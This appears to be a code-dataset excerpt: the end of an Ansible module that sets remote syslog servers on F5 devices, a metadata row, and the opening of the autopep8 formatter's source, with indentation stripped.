result = [v for k, v in iteritems(self.syslogs)]
self.changes = Changes(params=dict(remoteServers=result))
self.changes.update(self.want._values)
self.update_on_device()
return True
def update_on_device(self):
params = self.changes.api_params()
params = dict(
remoteServers=params.get('remoteServers')
)
uri = "https://{0}:{1}/mgmt/tm/sys/syslog/".format(
self.client.provider['server'],
self.client.provider['server_port'],
)
resp = self.client.api.patch(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] in [400, 409]:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
def read_current_from_device(self):
uri = "https://{0}:{1}/mgmt/tm/sys/syslog/".format(
self.client.provider['server'],
self.client.provider['server_port'],
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
result = response.get('remoteServers', [])
return result
class ArgumentSpec(object):
def __init__(self):
self.supports_check_mode = True
argument_spec = dict(
remote_host=dict(
required=True
),
remote_port=dict(),
local_ip=dict(),
name=dict(),
state=dict(
default='present',
choices=['absent', 'present']
)
)
self.argument_spec = {}
self.argument_spec.update(f5_argument_spec)
self.argument_spec.update(argument_spec)
def main():
spec = ArgumentSpec()
module = AnsibleModule(
argument_spec=spec.argument_spec,
supports_check_mode=spec.supports_check_mode
)
try:
mm = ModuleManager(module=module)
results = mm.exec_module()
module.exit_json(**results)
except F5ModuleError as ex:
module.fail_json(msg=str(ex))
if __name__ == '__main__':
main()
| gpl-3.0 | -3,912,569,845,770,745,000 | 30.063966 | 132 | 0.599149 | false |
Distrotech/intellij-community | python/helpers/pydev/third_party/pep8/autopep8.py | 21 | 121747 | #!/usr/bin/env python
#
# Copyright (C) 2010-2011 Hideo Hattori
# Copyright (C) 2011-2013 Hideo Hattori, Steven Myint
# Copyright (C) 2013-2014 Hideo Hattori, Steven Myint, Bill Wendling
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""Automatically formats Python code to conform to the PEP 8 style guide.
Fixes that only need be done once can be added by adding a function of the form
"fix_<code>(source)" to this module. They should return the fixed source code.
These fixes are picked up by apply_global_fixes().
Fixes that depend on pep8 should be added as methods to FixPEP8. See the class
documentation for more information.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import bisect
import codecs
import collections
import copy
import difflib
import fnmatch
import inspect
import io
import itertools
import keyword
import locale
import os
import re
import signal
import sys
import token
import tokenize
import pep8
try:
unicode
except NameError:
unicode = str
__version__ = '1.0.3'
CR = '\r'
LF = '\n'
CRLF = '\r\n'
PYTHON_SHEBANG_REGEX = re.compile(r'^#!.*\bpython[23]?\b\s*$')
# For generating line shortening candidates.
SHORTEN_OPERATOR_GROUPS = frozenset([
frozenset([',']),
frozenset(['%']),
frozenset([',', '(', '[', '{']),
frozenset(['%', '(', '[', '{']),
frozenset([',', '(', '[', '{', '%', '+', '-', '*', '/', '//']),
frozenset(['%', '+', '-', '*', '/', '//']),
])
DEFAULT_IGNORE = 'E24'
DEFAULT_INDENT_SIZE = 4
# W602 is handled separately due to the need to avoid "with_traceback".
CODE_TO_2TO3 = {
'E721': ['idioms'],
'W601': ['has_key'],
'W603': ['ne'],
'W604': ['repr'],
'W690': ['apply',
'except',
'exitfunc',
'import',
'numliterals',
'operator',
'paren',
'reduce',
'renames',
'standarderror',
'sys_exc',
'throw',
'tuple_params',
'xreadlines']}
def check_lib2to3():
try:
import lib2to3
except ImportError:
sys.path.append(os.path.join(os.path.dirname(__file__), 'lib2to3'))
import lib2to3
def open_with_encoding(filename, encoding=None, mode='r'):
"""Return opened file with a specific encoding."""
if not encoding:
encoding = detect_encoding(filename)
return io.open(filename, mode=mode, encoding=encoding,
newline='') # Preserve line endings
def detect_encoding(filename):
"""Return file encoding."""
try:
with open(filename, 'rb') as input_file:
check_lib2to3()
from lib2to3.pgen2 import tokenize as lib2to3_tokenize
encoding = lib2to3_tokenize.detect_encoding(input_file.readline)[0]
# Check for correctness of encoding
with open_with_encoding(filename, encoding) as test_file:
test_file.read()
return encoding
except (LookupError, SyntaxError, UnicodeDecodeError):
return 'latin-1'
def readlines_from_file(filename):
"""Return contents of file."""
with open_with_encoding(filename) as input_file:
return input_file.readlines()
def extended_blank_lines(logical_line,
blank_lines,
indent_level,
previous_logical):
"""Check for missing blank lines after class declaration."""
if previous_logical.startswith('class '):
if (
logical_line.startswith(('def ', 'class ', '@')) or
pep8.DOCSTRING_REGEX.match(logical_line)
):
if indent_level and not blank_lines:
yield (0, 'E309 expected 1 blank line after class declaration')
elif previous_logical.startswith('def '):
if blank_lines and pep8.DOCSTRING_REGEX.match(logical_line):
yield (0, 'E303 too many blank lines ({0})'.format(blank_lines))
elif pep8.DOCSTRING_REGEX.match(previous_logical):
# Missing blank line between class docstring and method declaration.
if (
indent_level and
not blank_lines and
logical_line.startswith(('def ')) and
'(self' in logical_line
):
yield (0, 'E301 expected 1 blank line, found 0')
pep8.register_check(extended_blank_lines)
def continued_indentation(logical_line, tokens, indent_level, indent_char,
noqa):
"""Override pep8's function to provide indentation information."""
first_row = tokens[0][2][0]
nrows = 1 + tokens[-1][2][0] - first_row
if noqa or nrows == 1:
return
# indent_next tells us whether the next block is indented. Assuming
# that it is indented by 4 spaces, then we should not allow 4-space
# indents on the final continuation line. In turn, some other
# indents are allowed to have an extra 4 spaces.
indent_next = logical_line.endswith(':')
row = depth = 0
valid_hangs = (
(DEFAULT_INDENT_SIZE,)
if indent_char != '\t' else (DEFAULT_INDENT_SIZE,
2 * DEFAULT_INDENT_SIZE)
)
# Remember how many brackets were opened on each line.
parens = [0] * nrows
# Relative indents of physical lines.
rel_indent = [0] * nrows
# For each depth, collect a list of opening rows.
open_rows = [[0]]
# For each depth, memorize the hanging indentation.
hangs = [None]
# Visual indents.
indent_chances = {}
last_indent = tokens[0][2]
indent = [last_indent[1]]
last_token_multiline = None
line = None
last_line = ''
last_line_begins_with_multiline = False
for token_type, text, start, end, line in tokens:
newline = row < start[0] - first_row
if newline:
row = start[0] - first_row
newline = (not last_token_multiline and
token_type not in (tokenize.NL, tokenize.NEWLINE))
last_line_begins_with_multiline = last_token_multiline
if newline:
# This is the beginning of a continuation line.
last_indent = start
# Record the initial indent.
rel_indent[row] = pep8.expand_indent(line) - indent_level
# Identify closing bracket.
close_bracket = (token_type == tokenize.OP and text in ']})')
# Is the indent relative to an opening bracket line?
for open_row in reversed(open_rows[depth]):
hang = rel_indent[row] - rel_indent[open_row]
hanging_indent = hang in valid_hangs
if hanging_indent:
break
if hangs[depth]:
hanging_indent = (hang == hangs[depth])
visual_indent = (not close_bracket and hang > 0 and
indent_chances.get(start[1]))
if close_bracket and indent[depth]:
# Closing bracket for visual indent.
if start[1] != indent[depth]:
yield (start, 'E124 {0}'.format(indent[depth]))
elif close_bracket and not hang:
pass
elif indent[depth] and start[1] < indent[depth]:
# Visual indent is broken.
yield (start, 'E128 {0}'.format(indent[depth]))
elif (hanging_indent or
(indent_next and
rel_indent[row] == 2 * DEFAULT_INDENT_SIZE)):
# Hanging indent is verified.
if close_bracket:
yield (start, 'E123 {0}'.format(indent_level +
rel_indent[open_row]))
hangs[depth] = hang
elif visual_indent is True:
# Visual indent is verified.
indent[depth] = start[1]
elif visual_indent in (text, unicode):
# Ignore token lined up with matching one from a previous line.
pass
else:
one_indented = (indent_level + rel_indent[open_row] +
DEFAULT_INDENT_SIZE)
# Indent is broken.
if hang <= 0:
error = ('E122', one_indented)
elif indent[depth]:
error = ('E127', indent[depth])
elif hang > DEFAULT_INDENT_SIZE:
error = ('E126', one_indented)
else:
hangs[depth] = hang
error = ('E121', one_indented)
yield (start, '{0} {1}'.format(*error))
# Look for visual indenting.
if (parens[row] and token_type not in (tokenize.NL, tokenize.COMMENT)
and not indent[depth]):
indent[depth] = start[1]
indent_chances[start[1]] = True
# Deal with implicit string concatenation.
elif (token_type in (tokenize.STRING, tokenize.COMMENT) or
text in ('u', 'ur', 'b', 'br')):
indent_chances[start[1]] = unicode
# Special case for the "if" statement because len("if (") is equal to
# 4.
elif not indent_chances and not row and not depth and text == 'if':
indent_chances[end[1] + 1] = True
elif text == ':' and line[end[1]:].isspace():
open_rows[depth].append(row)
# Keep track of bracket depth.
if token_type == tokenize.OP:
if text in '([{':
depth += 1
indent.append(0)
hangs.append(None)
if len(open_rows) == depth:
open_rows.append([])
open_rows[depth].append(row)
parens[row] += 1
elif text in ')]}' and depth > 0:
# Parent indents should not be more than this one.
prev_indent = indent.pop() or last_indent[1]
hangs.pop()
for d in range(depth):
if indent[d] > prev_indent:
indent[d] = 0
for ind in list(indent_chances):
if ind >= prev_indent:
del indent_chances[ind]
del open_rows[depth + 1:]
depth -= 1
if depth:
indent_chances[indent[depth]] = True
for idx in range(row, -1, -1):
if parens[idx]:
parens[idx] -= 1
break
assert len(indent) == depth + 1
if (
start[1] not in indent_chances and
# This is for purposes of speeding up E121 (GitHub #90).
not last_line.rstrip().endswith(',')
):
# Allow to line up tokens.
indent_chances[start[1]] = text
last_token_multiline = (start[0] != end[0])
if last_token_multiline:
rel_indent[end[0] - first_row] = rel_indent[row]
last_line = line
if (
indent_next and
not last_line_begins_with_multiline and
pep8.expand_indent(line) == indent_level + DEFAULT_INDENT_SIZE
):
pos = (start[0], indent[0] + 4)
yield (pos, 'E125 {0}'.format(indent_level +
2 * DEFAULT_INDENT_SIZE))
del pep8._checks['logical_line'][pep8.continued_indentation]
pep8.register_check(continued_indentation)
class FixPEP8(object):
"""Fix invalid code.
Fixer methods are prefixed "fix_". The _fix_source() method looks for these
automatically.
The fixer method can take either one or two arguments (in addition to
self). The first argument is "result", which is the error information from
pep8. The second argument, "logical", is required only for logical-line
fixes.
The fixer method can return the list of modified lines or None. An empty
list would mean that no changes were made. None would mean that only the
line reported in the pep8 error was modified. Note that the modified line
numbers that are returned are indexed at 1. This typically would correspond
with the line number reported in the pep8 error information.
[fixed method list]
- e121,e122,e123,e124,e125,e126,e127,e128,e129
- e201,e202,e203
- e211
- e221,e222,e223,e224,e225
- e231
- e251
- e261,e262
- e271,e272,e273,e274
- e301,e302,e303
- e401
- e502
- e701,e702
- e711
- w291
"""
def __init__(self, filename,
options,
contents=None,
long_line_ignore_cache=None):
self.filename = filename
if contents is None:
self.source = readlines_from_file(filename)
else:
sio = io.StringIO(contents)
self.source = sio.readlines()
self.options = options
self.indent_word = _get_indentword(''.join(self.source))
self.long_line_ignore_cache = (
set() if long_line_ignore_cache is None
else long_line_ignore_cache)
# Many fixers are the same even though pep8 categorizes them
# differently.
self.fix_e115 = self.fix_e112
self.fix_e116 = self.fix_e113
self.fix_e121 = self._fix_reindent
self.fix_e122 = self._fix_reindent
self.fix_e123 = self._fix_reindent
self.fix_e124 = self._fix_reindent
self.fix_e126 = self._fix_reindent
self.fix_e127 = self._fix_reindent
self.fix_e128 = self._fix_reindent
self.fix_e129 = self._fix_reindent
self.fix_e202 = self.fix_e201
self.fix_e203 = self.fix_e201
self.fix_e211 = self.fix_e201
self.fix_e221 = self.fix_e271
self.fix_e222 = self.fix_e271
self.fix_e223 = self.fix_e271
self.fix_e226 = self.fix_e225
self.fix_e227 = self.fix_e225
self.fix_e228 = self.fix_e225
self.fix_e241 = self.fix_e271
self.fix_e242 = self.fix_e224
self.fix_e261 = self.fix_e262
self.fix_e272 = self.fix_e271
self.fix_e273 = self.fix_e271
self.fix_e274 = self.fix_e271
self.fix_e309 = self.fix_e301
self.fix_e501 = (
self.fix_long_line_logically if
options and (options.aggressive >= 2 or options.experimental) else
self.fix_long_line_physically)
self.fix_e703 = self.fix_e702
self._ws_comma_done = False
def _fix_source(self, results):
try:
(logical_start, logical_end) = _find_logical(self.source)
logical_support = True
except (SyntaxError, tokenize.TokenError): # pragma: no cover
logical_support = False
completed_lines = set()
for result in sorted(results, key=_priority_key):
if result['line'] in completed_lines:
continue
fixed_methodname = 'fix_' + result['id'].lower()
if hasattr(self, fixed_methodname):
fix = getattr(self, fixed_methodname)
line_index = result['line'] - 1
original_line = self.source[line_index]
is_logical_fix = len(inspect.getargspec(fix).args) > 2
if is_logical_fix:
logical = None
if logical_support:
logical = _get_logical(self.source,
result,
logical_start,
logical_end)
if logical and set(range(
logical[0][0] + 1,
logical[1][0] + 1)).intersection(
completed_lines):
continue
modified_lines = fix(result, logical)
else:
modified_lines = fix(result)
if modified_lines is None:
# Force logical fixes to report what they modified.
assert not is_logical_fix
if self.source[line_index] == original_line:
modified_lines = []
if modified_lines:
completed_lines.update(modified_lines)
elif modified_lines == []: # Empty list means no fix
if self.options.verbose >= 2:
print(
'---> Not fixing {f} on line {l}'.format(
f=result['id'], l=result['line']),
file=sys.stderr)
else: # We assume one-line fix when None.
completed_lines.add(result['line'])
else:
if self.options.verbose >= 3:
print(
"---> '{0}' is not defined.".format(fixed_methodname),
file=sys.stderr)
info = result['info'].strip()
print('---> {0}:{1}:{2}:{3}'.format(self.filename,
result['line'],
result['column'],
info),
file=sys.stderr)
def fix(self):
"""Return a version of the source code with PEP 8 violations fixed."""
pep8_options = {
'ignore': self.options.ignore,
'select': self.options.select,
'max_line_length': self.options.max_line_length,
}
results = _execute_pep8(pep8_options, self.source)
if self.options.verbose:
progress = {}
for r in results:
if r['id'] not in progress:
progress[r['id']] = set()
progress[r['id']].add(r['line'])
print('---> {n} issue(s) to fix {progress}'.format(
n=len(results), progress=progress), file=sys.stderr)
if self.options.line_range:
start, end = self.options.line_range
results = [r for r in results
if start <= r['line'] <= end]
self._fix_source(filter_results(source=''.join(self.source),
results=results,
aggressive=self.options.aggressive))
if self.options.line_range:
# If number of lines has changed then change line_range.
count = sum(sline.count('\n')
for sline in self.source[start - 1:end])
self.options.line_range[1] = start + count - 1
return ''.join(self.source)
def _fix_reindent(self, result):
"""Fix a badly indented line.
This is done by adding or removing from its initial indent only.
"""
num_indent_spaces = int(result['info'].split()[1])
line_index = result['line'] - 1
target = self.source[line_index]
self.source[line_index] = ' ' * num_indent_spaces + target.lstrip()
def fix_e112(self, result):
"""Fix under-indented comments."""
line_index = result['line'] - 1
target = self.source[line_index]
if not target.lstrip().startswith('#'):
# Don't screw with invalid syntax.
return []
self.source[line_index] = self.indent_word + target
def fix_e113(self, result):
"""Fix over-indented comments."""
line_index = result['line'] - 1
target = self.source[line_index]
indent = _get_indentation(target)
stripped = target.lstrip()
if not stripped.startswith('#'):
# Don't screw with invalid syntax.
return []
self.source[line_index] = indent[1:] + stripped
def fix_e125(self, result):
"""Fix indentation undistinguish from the next logical line."""
num_indent_spaces = int(result['info'].split()[1])
line_index = result['line'] - 1
target = self.source[line_index]
spaces_to_add = num_indent_spaces - len(_get_indentation(target))
indent = len(_get_indentation(target))
modified_lines = []
while len(_get_indentation(self.source[line_index])) >= indent:
self.source[line_index] = (' ' * spaces_to_add +
self.source[line_index])
modified_lines.append(1 + line_index) # Line indexed at 1.
line_index -= 1
return modified_lines
def fix_e201(self, result):
"""Remove extraneous whitespace."""
line_index = result['line'] - 1
target = self.source[line_index]
offset = result['column'] - 1
if is_probably_part_of_multiline(target):
return []
fixed = fix_whitespace(target,
offset=offset,
replacement='')
self.source[line_index] = fixed
def fix_e224(self, result):
"""Remove extraneous whitespace around operator."""
target = self.source[result['line'] - 1]
offset = result['column'] - 1
fixed = target[:offset] + target[offset:].replace('\t', ' ')
self.source[result['line'] - 1] = fixed
def fix_e225(self, result):
"""Fix missing whitespace around operator."""
target = self.source[result['line'] - 1]
offset = result['column'] - 1
fixed = target[:offset] + ' ' + target[offset:]
# Only proceed if non-whitespace characters match.
# And make sure we don't break the indentation.
if (
fixed.replace(' ', '') == target.replace(' ', '') and
_get_indentation(fixed) == _get_indentation(target)
):
self.source[result['line'] - 1] = fixed
else:
return []
def fix_e231(self, result):
"""Add missing whitespace."""
# Optimize for comma case. This will fix all commas in the full source
# code in one pass. Don't do this more than once. If it fails the first
# time, there is no point in trying again.
if ',' in result['info'] and not self._ws_comma_done:
self._ws_comma_done = True
original = ''.join(self.source)
new = refactor(original, ['ws_comma'])
if original.strip() != new.strip():
self.source = [new]
return range(1, 1 + len(original))
line_index = result['line'] - 1
target = self.source[line_index]
offset = result['column']
fixed = target[:offset] + ' ' + target[offset:]
self.source[line_index] = fixed
def fix_e251(self, result):
"""Remove whitespace around parameter '=' sign."""
line_index = result['line'] - 1
target = self.source[line_index]
# This is necessary since pep8 sometimes reports columns that goes
# past the end of the physical line. This happens in cases like,
# foo(bar\n=None)
c = min(result['column'] - 1,
len(target) - 1)
if target[c].strip():
fixed = target
else:
fixed = target[:c].rstrip() + target[c:].lstrip()
# There could be an escaped newline
#
# def foo(a=\
# 1)
if fixed.endswith(('=\\\n', '=\\\r\n', '=\\\r')):
self.source[line_index] = fixed.rstrip('\n\r \t\\')
self.source[line_index + 1] = self.source[line_index + 1].lstrip()
return [line_index + 1, line_index + 2] # Line indexed at 1
self.source[result['line'] - 1] = fixed
def fix_e262(self, result):
"""Fix spacing after comment hash."""
target = self.source[result['line'] - 1]
offset = result['column']
code = target[:offset].rstrip(' \t#')
comment = target[offset:].lstrip(' \t#')
fixed = code + (' # ' + comment if comment.strip() else '\n')
self.source[result['line'] - 1] = fixed
def fix_e271(self, result):
"""Fix extraneous whitespace around keywords."""
line_index = result['line'] - 1
target = self.source[line_index]
offset = result['column'] - 1
if is_probably_part_of_multiline(target):
return []
fixed = fix_whitespace(target,
offset=offset,
replacement=' ')
if fixed == target:
return []
else:
self.source[line_index] = fixed
def fix_e301(self, result):
"""Add missing blank line."""
cr = '\n'
self.source[result['line'] - 1] = cr + self.source[result['line'] - 1]
def fix_e302(self, result):
"""Add missing 2 blank lines."""
add_linenum = 2 - int(result['info'].split()[-1])
cr = '\n' * add_linenum
self.source[result['line'] - 1] = cr + self.source[result['line'] - 1]
def fix_e303(self, result):
"""Remove extra blank lines."""
delete_linenum = int(result['info'].split('(')[1].split(')')[0]) - 2
delete_linenum = max(1, delete_linenum)
# We need to count because pep8 reports an offset line number if there
# are comments.
cnt = 0
line = result['line'] - 2
modified_lines = []
while cnt < delete_linenum and line >= 0:
if not self.source[line].strip():
self.source[line] = ''
modified_lines.append(1 + line) # Line indexed at 1
cnt += 1
line -= 1
return modified_lines
def fix_e304(self, result):
"""Remove blank line following function decorator."""
line = result['line'] - 2
if not self.source[line].strip():
self.source[line] = ''
def fix_e401(self, result):
"""Put imports on separate lines."""
line_index = result['line'] - 1
target = self.source[line_index]
offset = result['column'] - 1
if not target.lstrip().startswith('import'):
return []
indentation = re.split(pattern=r'\bimport\b',
string=target, maxsplit=1)[0]
fixed = (target[:offset].rstrip('\t ,') + '\n' +
indentation + 'import ' + target[offset:].lstrip('\t ,'))
self.source[line_index] = fixed
def fix_long_line_logically(self, result, logical):
"""Try to make lines fit within --max-line-length characters."""
if (
not logical or
len(logical[2]) == 1 or
self.source[result['line'] - 1].lstrip().startswith('#')
):
return self.fix_long_line_physically(result)
start_line_index = logical[0][0]
end_line_index = logical[1][0]
logical_lines = logical[2]
previous_line = get_item(self.source, start_line_index - 1, default='')
next_line = get_item(self.source, end_line_index + 1, default='')
single_line = join_logical_line(''.join(logical_lines))
try:
fixed = self.fix_long_line(
target=single_line,
previous_line=previous_line,
next_line=next_line,
original=''.join(logical_lines))
except (SyntaxError, tokenize.TokenError):
return self.fix_long_line_physically(result)
if fixed:
for line_index in range(start_line_index, end_line_index + 1):
self.source[line_index] = ''
self.source[start_line_index] = fixed
return range(start_line_index + 1, end_line_index + 1)
else:
return []
def fix_long_line_physically(self, result):
"""Try to make lines fit within --max-line-length characters."""
line_index = result['line'] - 1
target = self.source[line_index]
previous_line = get_item(self.source, line_index - 1, default='')
next_line = get_item(self.source, line_index + 1, default='')
try:
fixed = self.fix_long_line(
target=target,
previous_line=previous_line,
next_line=next_line,
original=target)
except (SyntaxError, tokenize.TokenError):
return []
if fixed:
self.source[line_index] = fixed
return [line_index + 1]
else:
return []
def fix_long_line(self, target, previous_line,
next_line, original):
cache_entry = (target, previous_line, next_line)
if cache_entry in self.long_line_ignore_cache:
return []
if target.lstrip().startswith('#'):
# Wrap commented lines.
return shorten_comment(
line=target,
max_line_length=self.options.max_line_length,
last_comment=not next_line.lstrip().startswith('#'))
fixed = get_fixed_long_line(
target=target,
previous_line=previous_line,
original=original,
indent_word=self.indent_word,
max_line_length=self.options.max_line_length,
aggressive=self.options.aggressive,
experimental=self.options.experimental,
verbose=self.options.verbose)
if fixed and not code_almost_equal(original, fixed):
return fixed
else:
self.long_line_ignore_cache.add(cache_entry)
return None
def fix_e502(self, result):
"""Remove extraneous escape of newline."""
line_index = result['line'] - 1
target = self.source[line_index]
self.source[line_index] = target.rstrip('\n\r \t\\') + '\n'
def fix_e701(self, result):
"""Put colon-separated compound statement on separate lines."""
line_index = result['line'] - 1
target = self.source[line_index]
c = result['column']
fixed_source = (target[:c] + '\n' +
_get_indentation(target) + self.indent_word +
target[c:].lstrip('\n\r \t\\'))
self.source[result['line'] - 1] = fixed_source
return [result['line'], result['line'] + 1]
def fix_e702(self, result, logical):
"""Put semicolon-separated compound statement on separate lines."""
if not logical:
return [] # pragma: no cover
logical_lines = logical[2]
line_index = result['line'] - 1
target = self.source[line_index]
if target.rstrip().endswith('\\'):
# Normalize '1; \\\n2' into '1; 2'.
self.source[line_index] = target.rstrip('\n \r\t\\')
self.source[line_index + 1] = self.source[line_index + 1].lstrip()
return [line_index + 1, line_index + 2]
if target.rstrip().endswith(';'):
self.source[line_index] = target.rstrip('\n \r\t;') + '\n'
return [line_index + 1]
offset = result['column'] - 1
first = target[:offset].rstrip(';').rstrip()
second = (_get_indentation(logical_lines[0]) +
target[offset:].lstrip(';').lstrip())
self.source[line_index] = first + '\n' + second
return [line_index + 1]
def fix_e711(self, result):
"""Fix comparison with None."""
line_index = result['line'] - 1
target = self.source[line_index]
offset = result['column'] - 1
right_offset = offset + 2
if right_offset >= len(target):
return []
left = target[:offset].rstrip()
center = target[offset:right_offset]
right = target[right_offset:].lstrip()
if not right.startswith('None'):
return []
if center.strip() == '==':
new_center = 'is'
elif center.strip() == '!=':
new_center = 'is not'
else:
return []
self.source[line_index] = ' '.join([left, new_center, right])
def fix_e712(self, result):
"""Fix comparison with boolean."""
line_index = result['line'] - 1
target = self.source[line_index]
offset = result['column'] - 1
# Handle very easy "not" special cases.
if re.match(r'^\s*if \w+ == False:$', target):
self.source[line_index] = re.sub(r'if (\w+) == False:',
r'if not \1:', target, count=1)
elif re.match(r'^\s*if \w+ != True:$', target):
self.source[line_index] = re.sub(r'if (\w+) != True:',
r'if not \1:', target, count=1)
else:
right_offset = offset + 2
if right_offset >= len(target):
return []
left = target[:offset].rstrip()
center = target[offset:right_offset]
right = target[right_offset:].lstrip()
# Handle simple cases only.
new_right = None
if center.strip() == '==':
if re.match(r'\bTrue\b', right):
new_right = re.sub(r'\bTrue\b *', '', right, count=1)
elif center.strip() == '!=':
if re.match(r'\bFalse\b', right):
new_right = re.sub(r'\bFalse\b *', '', right, count=1)
if new_right is None:
return []
if new_right[0].isalnum():
new_right = ' ' + new_right
self.source[line_index] = left + new_right
def fix_e713(self, result):
"""Fix non-membership check."""
line_index = result['line'] - 1
target = self.source[line_index]
# Handle very easy case only.
if re.match(r'^\s*if not \w+ in \w+:$', target):
self.source[line_index] = re.sub(r'if not (\w+) in (\w+):',
r'if \1 not in \2:',
target,
count=1)
def fix_w291(self, result):
"""Remove trailing whitespace."""
fixed_line = self.source[result['line'] - 1].rstrip()
self.source[result['line'] - 1] = fixed_line + '\n'
def get_fixed_long_line(target, previous_line, original,
indent_word=' ', max_line_length=79,
aggressive=False, experimental=False, verbose=False):
"""Break up long line and return result.
Do this by generating multiple reformatted candidates and then
ranking the candidates to heuristically select the best option.
"""
indent = _get_indentation(target)
source = target[len(indent):]
assert source.lstrip() == source
# Check for partial multiline.
tokens = list(generate_tokens(source))
candidates = shorten_line(
tokens, source, indent,
indent_word,
max_line_length,
aggressive=aggressive,
experimental=experimental,
previous_line=previous_line)
# Also sort alphabetically as a tie breaker (for determinism).
candidates = sorted(
sorted(set(candidates).union([target, original])),
key=lambda x: line_shortening_rank(x,
indent_word,
max_line_length,
experimental))
if verbose >= 4:
print(('-' * 79 + '\n').join([''] + candidates + ['']),
file=codecs.getwriter('utf-8')(sys.stderr.buffer
if hasattr(sys.stderr,
'buffer')
else sys.stderr))
if candidates:
return candidates[0]
def join_logical_line(logical_line):
"""Return single line based on logical line input."""
indentation = _get_indentation(logical_line)
return indentation + untokenize_without_newlines(
generate_tokens(logical_line.lstrip())) + '\n'
def untokenize_without_newlines(tokens):
"""Return source code based on tokens."""
text = ''
last_row = 0
last_column = -1
for t in tokens:
token_string = t[1]
(start_row, start_column) = t[2]
(end_row, end_column) = t[3]
if start_row > last_row:
last_column = 0
if (
(start_column > last_column or token_string == '\n') and
not text.endswith(' ')
):
text += ' '
if token_string != '\n':
text += token_string
last_row = end_row
last_column = end_column
return text
def _find_logical(source_lines):
# Make a variable which is the index of all the starts of lines.
logical_start = []
logical_end = []
last_newline = True
parens = 0
for t in generate_tokens(''.join(source_lines)):
if t[0] in [tokenize.COMMENT, tokenize.DEDENT,
tokenize.INDENT, tokenize.NL,
tokenize.ENDMARKER]:
continue
if not parens and t[0] in [tokenize.NEWLINE, tokenize.SEMI]:
last_newline = True
logical_end.append((t[3][0] - 1, t[2][1]))
continue
if last_newline and not parens:
logical_start.append((t[2][0] - 1, t[2][1]))
last_newline = False
if t[0] == tokenize.OP:
if t[1] in '([{':
parens += 1
elif t[1] in '}])':
parens -= 1
return (logical_start, logical_end)
def _get_logical(source_lines, result, logical_start, logical_end):
"""Return the logical line corresponding to the result.
Assumes input is already E702-clean.
"""
row = result['line'] - 1
col = result['column'] - 1
ls = None
le = None
for i in range(0, len(logical_start), 1):
assert logical_end
x = logical_end[i]
if x[0] > row or (x[0] == row and x[1] > col):
le = x
ls = logical_start[i]
break
if ls is None:
return None
original = source_lines[ls[0]:le[0] + 1]
return ls, le, original
def get_item(items, index, default=None):
if 0 <= index < len(items):
return items[index]
else:
return default
def reindent(source, indent_size):
"""Reindent all lines."""
reindenter = Reindenter(source)
return reindenter.run(indent_size)
def code_almost_equal(a, b):
"""Return True if code is similar.
Ignore whitespace when comparing specific line.
"""
split_a = split_and_strip_non_empty_lines(a)
split_b = split_and_strip_non_empty_lines(b)
if len(split_a) != len(split_b):
return False
for index in range(len(split_a)):
if ''.join(split_a[index].split()) != ''.join(split_b[index].split()):
return False
return True
def split_and_strip_non_empty_lines(text):
"""Return lines split by newline.
Ignore empty lines.
"""
return [line.strip() for line in text.splitlines() if line.strip()]
def fix_e265(source, aggressive=False): # pylint: disable=unused-argument
"""Format block comments."""
if '#' not in source:
# Optimization.
return source
ignored_line_numbers = multiline_string_lines(
source,
include_docstrings=True) | set(commented_out_code_lines(source))
fixed_lines = []
sio = io.StringIO(source)
line_number = 0
for line in sio.readlines():
line_number += 1
if (
line.lstrip().startswith('#') and
line_number not in ignored_line_numbers
):
indentation = _get_indentation(line)
line = line.lstrip()
# Normalize beginning if not a shebang.
if len(line) > 1:
if (
# Leave multiple spaces like '# ' alone.
(line.count('#') > 1 or line[1].isalnum())
# Leave stylistic outlined blocks alone.
and not line.rstrip().endswith('#')
):
line = '# ' + line.lstrip('# \t')
fixed_lines.append(indentation + line)
else:
fixed_lines.append(line)
return ''.join(fixed_lines)
def refactor(source, fixer_names, ignore=None):
"""Return refactored code using lib2to3.
Skip if ignore string is produced in the refactored code.
"""
check_lib2to3()
from lib2to3 import pgen2
try:
new_text = refactor_with_2to3(source,
fixer_names=fixer_names)
except (pgen2.parse.ParseError,
SyntaxError,
UnicodeDecodeError,
UnicodeEncodeError):
return source
if ignore:
if ignore in new_text and ignore not in source:
return source
return new_text
def code_to_2to3(select, ignore):
fixes = set()
for code, fix in CODE_TO_2TO3.items():
if code_match(code, select=select, ignore=ignore):
fixes |= set(fix)
return fixes
def fix_2to3(source, aggressive=True, select=None, ignore=None):
"""Fix various deprecated code (via lib2to3)."""
if not aggressive:
return source
select = select or []
ignore = ignore or []
return refactor(source,
code_to_2to3(select=select,
ignore=ignore))
def fix_w602(source, aggressive=True):
"""Fix deprecated form of raising exception."""
if not aggressive:
return source
return refactor(source, ['raise'],
ignore='with_traceback')
def find_newline(source):
"""Return type of newline used in source.
Input is a list of lines.
"""
assert not isinstance(source, unicode)
counter = collections.defaultdict(int)
for line in source:
if line.endswith(CRLF):
counter[CRLF] += 1
elif line.endswith(CR):
counter[CR] += 1
elif line.endswith(LF):
counter[LF] += 1
return (sorted(counter, key=counter.get, reverse=True) or [LF])[0]
def _get_indentword(source):
"""Return indentation type."""
